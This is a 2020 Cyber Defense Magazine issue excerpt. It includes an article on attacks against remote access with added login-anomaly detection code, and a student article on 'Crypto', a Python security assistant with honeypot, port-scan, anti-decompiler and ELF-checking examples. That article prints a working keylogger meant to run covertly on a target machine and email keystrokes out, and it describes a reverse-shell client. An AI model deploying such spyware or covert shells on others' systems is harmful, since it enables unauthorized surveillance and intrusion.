Stan Lowe, Global Chief Information Security Officer. Stan Lowe, a cybersecurity and technology executive, has successfully led transformational change in large, complex environments, as well as small and mid-size cybersecurity and IT organizations.

As Zscaler Global Chief Information Security Officer, Stan oversees the security of the Zscaler enterprise and works with the product and operations groups to ensure that Zscaler products and services are secure. Part of his focus is to work with customers to help them fully utilize Zscaler services and realize the maximum return on their investment.

Prior to joining Zscaler, Stan served as the VP & Global Chief Information Security Officer for PerkinElmer, where he was responsible for global enterprise security and privacy. He has also been a Cyber Security Principal at Booz Allen Hamilton.

Stan has extensive federal experience, serving as the U.S. Department of Veterans Affairs (VA) Deputy Assistant Secretary for Information Security, Chief Information Security Officer, and Deputy Chief Privacy Officer, as well as Deputy Director of the Department of Defense/VA Interagency Program Office. Before joining the VA, Stan served as Chief Information Officer of the Federal Trade Commission. Stan’s public service record extends to the U.S. Department of Interior in the Bureau, the U.S. Postal Service Inspector General, and the U.S. Navy.

Stan has also served as an executive in several technology startups, and currently serves on several boards advising on cybersecurity. He is a frequent speaker and writer on security topics.


CERT Warns Bad Actors Are Targeting Remote Access – How Security Operations Find And Route These “Below The Radar” Attacks

New Ransomware/Exfiltration Campaign Targeting Remote Access Resists Resolution Through Data Restoration

By Saryu Nayyar, CEO, Gurucul

Remote access tools, such as VPNs, RDP, VNC, Citrix, and others, have always been an inviting target for attackers. Even 2003’s Matrix Reloaded used an exploit against an old version of Secure Shell (SSH) as a plot device in a rare cinematic example of a real-world cyber-security threat. The recent shift to a remote workforce in response to a global pandemic has made remote access an even more inviting target for threat actors of all stripes.

As a recent report from New Zealand’s CERT pointed out, malicious actors are actively focusing on remote access vectors, using a range of attack techniques. While unpatched systems are an ongoing issue, attackers are also targeting weak authentication schemes, including a notable lack of two-factor authentication. The users themselves are also a primary target. Targeted email such as spear phishing, which goes for a specific target, or cast-netting, which targets people within a single organization, has a history of success and has seen a noticeable rise.

Fortunately, information security professionals still have a range of tools and techniques they can use to help prevent breaches and to mitigate them when they do happen.

Many attack scenarios, especially ones involving remote access attacks, start with targeting the users themselves. Many penetration testers will tell you the users are the easiest target and the first thing they’ll go after. But this also gives an organization the opportunity to convert their user base from part of the attack surface into their first line of defense. Making sure you have trained them on best practices and have enabled a strong multi-factor authentication scheme can go a long way to preventing unauthorized access.

For many organizations, the Security Operations team, rather than their users, is the main line of defense. Even when the services are provided whole, or in part, by a third party, they are the ones who have the ultimate responsibility for the organization’s security well-being. This means assuring they have the correct tools and the right training is as important as making sure the users are trained and equipped. The question becomes whether they have the right tools and training to identify and mitigate attack profiles that have now shifted to target the remote workforce.

The threats they have been historically focused on have not disappeared, but they may no longer be the primary attack surface. Likewise, the tools they use to identify and mitigate attacks may not be the best ones now that the attacker’s focus has shifted.

Threat actors have become increasingly skilled at compromising systems and then hiding their activity “below the radar” to avoid detection. More so now that they have a remote workforce to both target for attack and use for concealment. That means the SecOps team will need to look at the situation holistically rather than relying on single indicators of compromise.

To that end, an advanced security analytics platform that can consolidate all the organization’s security data into a single place and then perform AI-based analytics on the entirety of the data may be in order. By looking at all the information, it is possible to identify anomalous behavior that differs subtly from what’s expected, or accepted, for a normal user. That can be the first indication of a compromise. Using machine learning techniques, the system can adapt to the changing threat surface and present a risk-based assessment to the SecOps team.

Combined with their existing tools and efficient automation, security operations personnel can get ahead of an attack to keep a single compromised account or remote access system from escalating to a serious data breach.
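The holistic, risk-based view described above (several weak signals combined rather than one indicator of compromise deciding) can be shown on remote-access logs. The following added example is not Gurucul's product or code: it learns a per-user baseline from past successful VPN logins, then scores each new login on new country, new device, unusual hour and a burst of preceding failures, raising an alert only when the combined risk crosses a threshold. The log format, field names, weights, threshold and every log line are constructed assumptions for this example.

```python
"""Risk-based assessment of remote-access logins over consolidated logs.

Added example; not Gurucul's code.  Log format, weights, threshold and all
log lines are constructed assumptions.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field
from datetime import datetime
from typing import Dict, List, Set, Tuple

LINE_RE = re.compile(r"^(?P<ts>\S+) (?P<host>\S+) login (?P<kv>.+)$")
WEIGHTS = {"new_country": 40, "new_device": 30, "unusual_hour": 20, "after_failures": 25}


@dataclass(frozen=True)
class Event:
    ts: datetime
    user: str
    src: str
    country: str
    device: str
    success: bool


def parse_line(line: str) -> Event:
    """Parse one 'ts gateway login k=v k=v ...' line (assumed gateway format)."""
    m = LINE_RE.match(line.strip())
    if not m:
        raise ValueError(f"unrecognised log line: {line!r}")
    kv = dict(tok.split("=", 1) for tok in m.group("kv").split())
    return Event(ts=datetime.strptime(m.group("ts"), "%Y-%m-%dT%H:%M:%SZ"),
                 user=kv["user"], src=kv["src"], country=kv["country"],
                 device=kv["device"], success=kv["result"] == "success")


@dataclass
class Baseline:
    countries: Set[str] = field(default_factory=set)
    devices: Set[str] = field(default_factory=set)
    hours: Set[int] = field(default_factory=set)


def build_baselines(events: List[Event]) -> Dict[str, Baseline]:
    """What 'normal' looks like per user, learned from successful logins only."""
    baselines: Dict[str, Baseline] = defaultdict(Baseline)
    for e in events:
        if e.success:
            b = baselines[e.user]
            b.countries.add(e.country)
            b.devices.add(e.device)
            b.hours.add(e.ts.hour)
    return baselines


def score(e: Event, b: Baseline, recent_failures: int) -> Tuple[int, List[str]]:
    """Sum the weights of every signal that fires.  A user with no baseline
    fires all three baseline signals, which is intended."""
    reasons = []
    if e.country not in b.countries:
        reasons.append("new_country")
    if e.device not in b.devices:
        reasons.append("new_device")
    if all(abs(e.ts.hour - h) > 1 for h in b.hours):   # not within an hour of any usual time
        reasons.append("unusual_hour")
    if recent_failures >= 3:                            # password guessing just before success
        reasons.append("after_failures")
    return sum(WEIGHTS[r] for r in reasons), reasons


def assess(training: List[str], live: List[str], threshold: int = 50) -> List[dict]:
    """One alert per successful login whose combined risk reaches the threshold."""
    baselines = build_baselines([parse_line(l) for l in training])
    failures: Dict[str, int] = defaultdict(int)   # consecutive failures per user
    alerts = []
    for e in (parse_line(l) for l in live):
        if not e.success:
            failures[e.user] += 1
            continue
        risk, reasons = score(e, baselines[e.user], failures[e.user])
        failures[e.user] = 0
        if risk >= threshold:
            alerts.append({"user": e.user, "src": e.src, "ts": e.ts.isoformat(),
                           "risk": risk, "reasons": reasons})
    return alerts


# Constructed sample logs (documentation IP ranges; 'ZZ' is a placeholder country code)
TRAINING = [
    "2020-06-01T08:02:11Z vpn-gw1 login user=alice src=203.0.113.10 country=US device=lt-alice result=success",
    "2020-06-02T08:45:09Z vpn-gw1 login user=alice src=203.0.113.10 country=US device=lt-alice result=success",
    "2020-06-03T17:10:40Z vpn-gw1 login user=alice src=203.0.113.11 country=US device=lt-alice result=success",
    "2020-06-01T09:30:00Z vpn-gw1 login user=bob src=198.51.100.7 country=DE device=lt-bob result=success",
]
LIVE = [
    "2020-06-15T08:30:12Z vpn-gw1 login user=alice src=203.0.113.10 country=US device=lt-alice result=success",
    "2020-06-15T03:14:55Z vpn-gw1 login user=alice src=192.0.2.77 country=ZZ device=lt-alice result=failure",
    "2020-06-15T03:15:02Z vpn-gw1 login user=alice src=192.0.2.77 country=ZZ device=lt-alice result=failure",
    "2020-06-15T03:15:20Z vpn-gw1 login user=alice src=192.0.2.77 country=ZZ device=lt-alice result=failure",
    "2020-06-15T03:16:01Z vpn-gw1 login user=alice src=192.0.2.77 country=ZZ device=win-unknown result=success",
    "2020-06-15T10:05:00Z vpn-gw1 login user=bob src=198.51.100.7 country=DE device=lt-bob result=success",
]

if __name__ == "__main__":
    for alert in assess(TRAINING, LIVE):
        print(alert)
```

Alice's normal morning login scores zero, bob logging in an hour later than usual scores zero, and only the login that is new in country, device and hour and follows three failures is raised, with the reasons attached so an analyst can triage without re-reading the raw logs. A production baseline would be rebuilt on a rolling window so that it adapts as the workforce's habits change.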

About the Author

Saryu Nayyar is the CEO of Gurucul. She is an internationally recognized cybersecurity expert, author and speaker with more than 15 years of experience in the information security, identity and access management, IT risk and compliance, and security risk management sectors. She was named EY Entrepreneurial Winning Women in 2017. She has held leadership roles in security products and services strategy at Oracle, Simeio, Sun Microsystems, Vaau (acquired by Sun) and Disney, and held senior positions in the technology security and risk management practice of Ernst & Young. She is passionate about building disruptive technologies and has several patents pending for behavior analytics, anomaly detection and dynamic risk scoring inventions.

Saryu can be reached on Twitter at @Gurucul


CRYPTO

An Amalgamation of Cyber Defense and Ethical Hacking Mechanisms

By Staford Titus S

Prelude

Security on its own is a misnomer in this technological and (for the most part) cybernated era. Cyber-security has emerged as a crucial factor in protecting almost every, or at least the online, aspect of human lives. The preponderance of electronic devices used are computers, including mobile phones, smart TVs and even smart watches, all of which contain personal or business data. Cybercrimes take place ubiquitously, wreaking havoc by causing loss and sometimes even misuse of this information. According to RiskIQ’s 2019 Evil Internet Minute, cybercrimes cost the global economy around $2.9 million every minute. This invokes the necessity to secure data, to prevent it from being stolen or compromised. It is thus safe to assume that cybercrimes are imminent, and hence preventive countermeasures are required to be set in place to sail above these turbulent waves of cyber-attacks.

Centralizing this theme initiated the development of Crypto. The idea involves developing an AI assistant that is capable of implementing secure policies using built-in security tools and also aiding in ethical hacking operations. For those of you for whom, on reading the word AI, nightmares of AI world domination are imminent:

Fig 1: AI Meme

This article documents the several security and hacking methodologies built into Crypto. A good number of security policies and frameworks have been implemented to help secure the systems.

The Root

The developmental strategies involved are loosely adhered to and inspired by the control strategies/countermeasures discussed by Charles P. Pfleeger in the book “Security in Computing”. According to Fig 2 we can deal with cyber attacks in the following ways:

1. prevent it, by blocking the attack or closing the vulnerability

2. deter it, by making the attack harder but not impossible

3. deflect it, by making another target more attractive (or this one less so)

4. mitigate it, by making its impact less severe

5. detect it, either as it happens or some time after the fact

6. recover from its effects

“Prevention is better than cure!” Following that statement is what is aimed to be accomplished, since it’s always better to prevent an attack than to build back upon its wreckage. The aforementioned strategies are implemented in several different ways, of which an example is the Intrusion Detection System, which helps detect anomalies and intrusions and direct them to honeypots or isolated networks, in turn incorporating a pooled approach of the control strategies.

Fig 2: Control Strategies from the book “Security in Computing”

Under the Hood and UI

Built with the primary intention to implement security mechanisms and countermeasures along with hacker-aiding tools, Crypto’s underlying architecture is fueled by good old Python. Python was chosen over other programming languages due to the sheer size of the open-source libraries and packages that it offers. Eel was introduced in the infrastructure to establish an undeterred connection between the frontend and backend functions/mechanisms. Eel is a little Python library for making simple Electron-like offline HTML/JS GUI apps. Eel offered so much more than it promised, which helped incorporate several features which previously couldn’t be fused. Implementing Eel is as simple as adding an “@eel.expose” line before a function in Python. Considering the versatility and user-friendliness, as well as the various design milestones that could be reached using HTML and CSS, the offering is not a CLI tool but has a natty-looking GUI. Centre-bottom is the user input, top-middle is the chat box, bottom-left is the news tab, bottom-right is the console, which displays all of the console logs and messages, and top-right is the date & time and weather data. Top-left is reserved for popup menus. The next few sections elucidate the several security and hacking mechanisms implemented in the project module.

Fig 3: Screengrab of Crypto’s UI

Security Mechanisms

Honeypot

Luring an unsuspecting attacker into a trap is the singular mechanism that a honeypot implements. According to Wikipedia, a honeypot is a computer security mechanism set to detect, deflect, or, in some manner, counteract attempts at unauthorized use of information systems. Creating a honeypot on any port presents it as a decoy enticing to attackers, thus enabling prevention or at least deceleration of attacks on the main system. Logging the honeypot environment for any of the activities performed by attackers mistaking the honeypot for a real loophole is also implemented to enhance the security policy. The logs can be sent to the user’s mail or even stored on remote servers such as Graylog for future pattern analysis. Below is a code sample of the honeypot:

import atexit
import socket

import eel  # Eel bridges this function to the HTML/JS front end


def sendLog(source, data):
    # Not shown in the article: a minimal stand-in that appends each hit to a
    # local file. Crypto forwards the logs by mail or to a Graylog server.
    if isinstance(data, bytes):
        data = data.decode('utf-8', errors='replace')
    with open('honeypot.log', 'a') as fh:
        fh.write(source + ' ' + data.strip() + '\n')


@eel.expose
def honeypot():
    LHOST = '0.0.0.0'           # listen on every interface
    LPORT = 1024                # decoy port; unprivileged, so no root needed
    RHOST = '192.168.29.203'    # not used in this excerpt
    RPORT = 9000                # not used in this excerpt
    BANNER = '220 ProFTPD 1.2.8 Server\nName: '   # fake FTP banner sent to the client
    TIMEOUT = 10                # seconds to wait for the client's first bytes
    listener = socket.socket(socket.AF_INET, socket.SOCK_STREAM)

    def exit_handler():
        # Not shown in the article: release the listening port on exit
        listener.close()

    def hon():
        print('[*] Honeypot starting on ' + LHOST + ':' + str(LPORT))
        eel.test('[*] Honeypot starting on ' + LHOST + ':' + str(LPORT))  # echo to the GUI console
        atexit.register(exit_handler)
        listener.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1)
        listener.bind((LHOST, LPORT))
        listener.listen(5)
        while True:
            (insock, address) = listener.accept()
            insock.settimeout(TIMEOUT)
            msg = ('[*] Honeypot connection from ' + address[0] + ':' + str(address[1])
                   + ' on port ' + str(LPORT))
            print(msg)
            eel.test(msg)
            try:
                insock.send(BANNER.encode())
                data = insock.recv(1024)   # whatever the client types after the banner
            except socket.error as e:
                sendLog(address[0], 'Error: ' + str(e))
            else:
                sendLog(address[0], data)   # record source address and the bytes received
            finally:
                insock.close()

    hon()

Fig 4: Screengrab of Honeypot in Action

Intrusion Detection System

Intrusion Detection is a particularly, very important mechanism to implement, since detecting an anomaly

or intrusion is the fundamental step in protecting a system. It is based on strategies involved in applying

round-the clock detection and scanning. The IDS is created as a virtual network using mininets which

serve as honeypot hosts that continually monitor the traffic flowing in and out of the network for anomalies.

If an anomaly or outlier is detected, then an email is sent to the user of the same, and fake SYN packets

are sent for the attackers to connect to a virtualized and isolated mininet network. This mechanism is still

under rudimentary development and testing owing to the length and breadth of operations and functions

it aims to deliver.

Parser Differential

This mechanism is implemented in order to cripple the various ELF executable decompilers out there. The given C program is run through an algorithm that makes the resulting executable unreadable to reversing tools such as radare2 or even gdb. The mechanism is heavily influenced by LiveOverflow's Reversing series. As a result, cracking programs to find license keys gets much harder. The parser differential module lets the user upload C programs that they want to scramble in order to prevent cracking. The underlying algorithm is quite simple but extremely effective: only one random byte within the executable is scrambled, which renders the whole executable unreadable to decompilers while it still runs normally from the Linux terminal. Hence the code can be executed but not decompiled.
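The article does not show which byte its module scrambles, so the following is an added example (not the author's code) from the analyst's side: a checker that flags ELF64 images whose section-header fields are inconsistent, the kind of loader-ignored damage that leaves a binary runnable while disassemblers and debuggers that trust those fields fail to parse it. The sample images are constructed in memory and are not real binaries.

```python
import struct

# Little-endian ELF64 file header: e_ident[16] followed by the fixed fields (64 bytes total).
ELF64_HDR = struct.Struct("<16sHHIQQQIHHHHHH")
EHDR_SIZE, PHDR_SIZE, SHDR_SIZE = 64, 56, 64


def check_elf64(data):
    """Return findings for an in-memory little-endian ELF64 image ([] means nothing odd).
    The loader only needs the program headers; analysis tools also trust the section headers."""
    if len(data) < EHDR_SIZE or data[:4] != b"\x7fELF":
        return ["not an ELF image"]
    if data[4] != 2 or data[5] != 1:
        return ["only little-endian ELF64 is handled by this checker"]
    (_, _, _, _, _, e_phoff, e_shoff, _, e_ehsize, e_phentsize, e_phnum,
     e_shentsize, e_shnum, e_shstrndx) = ELF64_HDR.unpack_from(data)
    size = len(data)
    findings = []
    if e_ehsize != EHDR_SIZE:
        findings.append(f"e_ehsize={e_ehsize}, expected {EHDR_SIZE}")
    # Program header table: the loader reads this, so damage here breaks execution too.
    if e_phnum and (e_phentsize != PHDR_SIZE or e_phoff + e_phnum * PHDR_SIZE > size):
        findings.append("program header table out of bounds or wrong entry size")
    # Section header table: ignored by the loader, trusted by disassemblers and debuggers.
    if e_shoff:
        if e_shentsize != SHDR_SIZE:
            findings.append(f"e_shentsize={e_shentsize}, expected {SHDR_SIZE}")
        if e_shoff + e_shnum * SHDR_SIZE > size:
            findings.append(f"section header table at 0x{e_shoff:x} runs past end of file")
        if e_shnum and e_shstrndx >= e_shnum:
            findings.append(f"e_shstrndx={e_shstrndx} is not below e_shnum={e_shnum}")
    return findings


def build_sample(e_shoff=120, e_shnum=2, e_shstrndx=1):
    """Constructed 248-byte ELF64 skeleton (x86-64, one phdr slot, two shdr slots); not a real binary."""
    ident = b"\x7fELF" + bytes([2, 1, 1, 0]) + b"\x00" * 8
    hdr = ELF64_HDR.pack(ident, 2, 0x3E, 1, 0x400000, EHDR_SIZE, e_shoff, 0,
                         EHDR_SIZE, PHDR_SIZE, 1, SHDR_SIZE, e_shnum, e_shstrndx)
    return hdr + b"\x00" * (PHDR_SIZE + 2 * SHDR_SIZE)


if __name__ == "__main__":
    print("intact:", check_elf64(build_sample()))                       # []
    print("shoff past EOF:", check_elf64(build_sample(e_shoff=0xFFFF)))
    print("bad shstrndx:", check_elf64(build_sample(e_shstrndx=5)))
```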

Facial Recognition

Facial recognition is a biometric, artificial-intelligence-based algorithm that can uniquely identify a person by analyzing patterns based on the person's facial textures and shape. Facial recognition has been implemented with the JavaScript face recognition library using Haar cascades. This implementation enhances security by preventing misuse of the features by strangers or unknown individuals.

Hacking Mechanisms

Port Scanning

Reconnaissance is the first step of any hacking activity, since it is highly important to analyze the intended target on an intricate or, at the least, a basic level. Port scanning is one such pre-enumeration method used to identify open ports and services available on a network host. It can also be considered a security mechanism, since, under the countermeasures defined above, it is a method of detection/prevention: it can be performed to detect open ports within any network, enabling admins to close or secure unused or time-constrained ports. Hackers, on the other hand, can use port scanning to identify the open ports through which they can access the network to perform ping attacks or smurf attacks at the least. Implementation of this mechanism requires the python-nmap module, which supports various types of scans. Fig 5 depicts the port scanning process.

Fig 5: Port Scanning demonstration
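As an added example of the admin-side use described above (not the author's module), this compares one host's python-nmap result against the ports an administrator expects to be open; the sample result is constructed, and the live helper assumes the nmap binary is installed and that the host is given as an IP address, which is how python-nmap keys its results.

```python
def unexpected_open_ports(tcp_result, allowlist):
    """Compare one host's TCP results against the ports an admin expects to be open.

    tcp_result mirrors python-nmap's nm[host]['tcp']: {port: {'state': ..., 'name': ...}}.
    Returns (open ports not on the allowlist, allowlisted ports that are not open).
    """
    open_ports = {int(p) for p, info in tcp_result.items() if info.get("state") == "open"}
    expected = set(allowlist)
    return sorted(open_ports - expected), sorted(expected - open_ports)


def scan_host_tcp(host, ports="1-1024"):
    """Live scan via python-nmap (needs the nmap binary on PATH); returns nm[host]['tcp'] or {}."""
    import nmap  # imported here so the offline part of the example runs without it
    nm = nmap.PortScanner()
    nm.scan(hosts=host, ports=ports, arguments="-sT")  # TCP connect scan, no raw sockets needed
    if host not in nm.all_hosts():  # all_hosts() lists IP addresses, so pass an IP as host
        return {}
    return {p: nm[host]["tcp"][p] for p in nm[host].all_tcp()}


# Constructed sample result standing in for a scan of one host (not real scan output).
SAMPLE_TCP = {
    22: {"state": "open", "name": "ssh"},
    80: {"state": "open", "name": "http"},
    443: {"state": "closed", "name": "https"},
    3306: {"state": "open", "name": "mysql"},
}
ALLOWLIST = [22, 80, 443]  # what the admin believes should be listening

if __name__ == "__main__":
    extra, missing = unexpected_open_ports(SAMPLE_TCP, ALLOWLIST)
    print("unexpected open:", extra)          # [3306]
    print("expected but not open:", missing)  # [443]
```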

Reverse Shell

Gaining access to target systems can be a pain, so reverse shells have been integrated to provide substantial aid in enumeration and forensic analysis. For this, a client-side package is provided which, when run on the target machine, activates the reverse shell, establishing the connection by binding sockets over ports. Once the reverse shell is active, users can type Unix commands to access the data on the target machine. It also enables users to download or upload files over FTP connections.

Keylogger

The keylogger is another tool which can be used to log keystrokes. Users are provided with a client package which runs in the background on the target machine, records keystrokes with high precision and also sends the keylogger data to the user's email. An example code snippet of the keylogger is shown below:

from pynput.keyboard import Listener

def logger(key):
    letter = str(key)
    letter = letter.replace("'", "")
    if letter == 'Key.space':
        letter = ' '
    if letter == 'Key.shift_r':
        letter = ''
    if letter == "Key.ctrl_l":
        letter = ""
    if letter == "Key.enter":
        letter = "\n"
    with open("log.txt", 'a') as f:
        f.write(letter)

with Listener(on_press=logger) as l:
    l.join()



Encode/Decode

Any pentester or hacker will, without doubt, have faced encoded data in their various hacking endeavours. Hence several of the most popular encoding/decoding schemes, such as Base64, URL encoding, Brainfuck and JS obfuscation, have been implemented. Encryption using AES (Advanced Encryption Standard) is also provided, as depicted in Fig 6.

Fig 6: AES Encryption

Auxiliary Features/Mechanisms

The several auxiliary mechanisms intertwined are:

- Captcha Breaker
- Strong Password Generator
- File Scanning
- Email Sender
- Time and Weather
- News
- AI you can converse with

Conclusion

At present, cyber-crimes have become more dangerous than ever before, carried out by menacing hackers from all around the globe. It is therefore high time that cyber security is given the front seat, enabling us to fight back. The approach to implementing the security policies documented above is but a small step in aiding ethical hackers. Hopefully, this article succeeded in portraying “a method” to embrace the countermeasures and security mechanisms.



References

Charles P. Pfleeger, “Security in Computing”.

LiveOverflow, on YouTube or at www.liveoverflow.com

Mininet: Rapid Prototyping for Software Networks.

Xavier A. Larriva-Novo and Mario Vega-Barbas, “Evaluation of Cybersecurity Data Set Characteristics for Their Applicability to Neural Networks Algorithms Detecting Cybersecurity Anomalies”, 01 January 2020.

About the Author

I am a budding Ethical Hacker with a towering interest in the security field. I am currently pursuing my Bachelors in Computer Science and Engineering at Jaya Engineering College in Chennai, India. I have participated in several CTF competitions and completed several courses on pentesting. My interest in cyber-security was piqued by the length and breadth of its applications and the thrill involved in solving the challenges. Hence, to no one’s surprise, I am currently working on several vulnhub boxes and overthewire challenges. Anybody wanting to collaborate can connect on Twitter (@stafordtitus) or LinkedIn (https://www.linkedin.com/in/stafordtitus-643638147/).


Meet Our Publisher: Gary S. Miliefsky, CISSP, fmDHS

“Amazing Keynote”

“Best Speaker on the Hacking Stage”

“Most Entertaining and Engaging”

Gary has been keynoting cyber security events throughout the year. He’s also been a moderator and a panelist, and has numerous upcoming events throughout the year.

If you are looking for a cybersecurity expert who can make the difference between a nice event and a stellar conference, look no further: email marketing@cyberdefensemagazine.com



You asked, and it’s finally here…we’ve launched CyberDefense.TV

At least a dozen exceptional interviews rolling out each month starting this summer…

Market leaders, innovators, CEO hot seat interviews and much more.

A new division of Cyber Defense Media Group and sister to Cyber Defense Magazine.



Free Monthly Cyber Defense eMagazine Via Email

Enjoy our monthly electronic editions of our Magazines for FREE.

This magazine is by and for ethical information security professionals with a twist on innovative consumer products and privacy issues on top of best practices for IT security and Regulatory Compliance. Our mission is to share cutting edge knowledge, real world stories and independent lab reviews on the best ideas, products and services in the information technology industry. Our monthly Cyber Defense e-Magazines will also keep you up to speed on what’s happening in the cyber-crime and cyber warfare arena, plus we’ll inform you as next generation and innovative technology vendors have news worthy of sharing with you – so enjoy. You get all of this for FREE, always, for our electronic editions. Click here to sign up today and within moments, you’ll receive your first email from us with an archive of our newsletters along with this month’s newsletter.

By signing up, you’ll always be in the loop with CDM.

Copyright (C) 2020, Cyber Defense Magazine, a division of CYBER DEFENSE MEDIA GROUP (STEVEN G. SAMUELS LLC. d/b/a) 276 Fifth Avenue, Suite 704, New York, NY 10001, Toll Free (USA): 1-833-844-9468 d/b/a CyberDefenseAwards.com, CyberDefenseMagazine.com, CyberDefenseNewswire.com, CyberDefenseProfessionals.com, CyberDefenseRadio.com and CyberDefenseTV.com, is a Limited Liability Corporation (LLC) originally incorporated in the United States of America. Our Tax ID (EIN) is: 45-4188465, Cyber Defense Magazine® is a registered trademark of Cyber Defense Media Group. EIN: 454-18-8465, DUNS# 078358935. All rights reserved worldwide. marketing@cyberdefensemagazine.com

All rights reserved worldwide. Copyright © 2020, Cyber Defense Magazine. All rights reserved. No part of this newsletter may be used or reproduced by any means, graphic, electronic, or mechanical, including photocopying, recording, taping or by any information storage retrieval system without the written permission of the publisher except in the case of brief quotations embodied in critical articles and reviews. Because of the dynamic nature of the Internet, any Web addresses or links contained in this newsletter may have changed since publication and may no longer be valid. The views expressed in this work are solely those of the author and do not necessarily reflect the views of the publisher, and the publisher hereby disclaims any responsibility for them. Send us great content and we’ll post it in the magazine for free, subject to editorial approval and layout. Email us at marketing@cyberdefensemagazine.com

Cyber Defense Magazine

276 Fifth Avenue, Suite 704, New York, NY 1000

EIN: 454-18-8465, DUNS# 078358935.

All rights reserved worldwide.

marketing@cyberdefensemagazine.com

www.cyberdefensemagazine.com

NEW YORK (US HQ), LONDON (UK/EU), HONG KONG (ASIA)

Cyber Defense Magazine - Cyber Defense eMagazine rev. date: 07/01/2020



TRILLIONS ARE AT STAKE

No 1 INTERNATIONAL BESTSELLER IN FOUR CATEGORIES

Released:

https://www.amazon.com/Cryptoconomy-Bitcoins-Blockchains-Bad-Guys-ebook/dp/B07KPNS9NH

In Development:



8 Years in The Making…

Thank You to our Loyal Subscribers!

We've Completely Rebuilt CyberDefenseMagazine.com - Please Let Us Know What You Think. It's mobile and tablet friendly and superfast. We hope you like it. In addition, we're shooting for 7x24x365 uptime as we continue to scale with improved Web App Firewalls, Content Delivery Networks (CDNs) around the Globe, Faster and More Secure DNS and CyberDefenseMagazineBackup.com up and running as an array of live mirror sites.

Millions of monthly readers and new platforms coming…
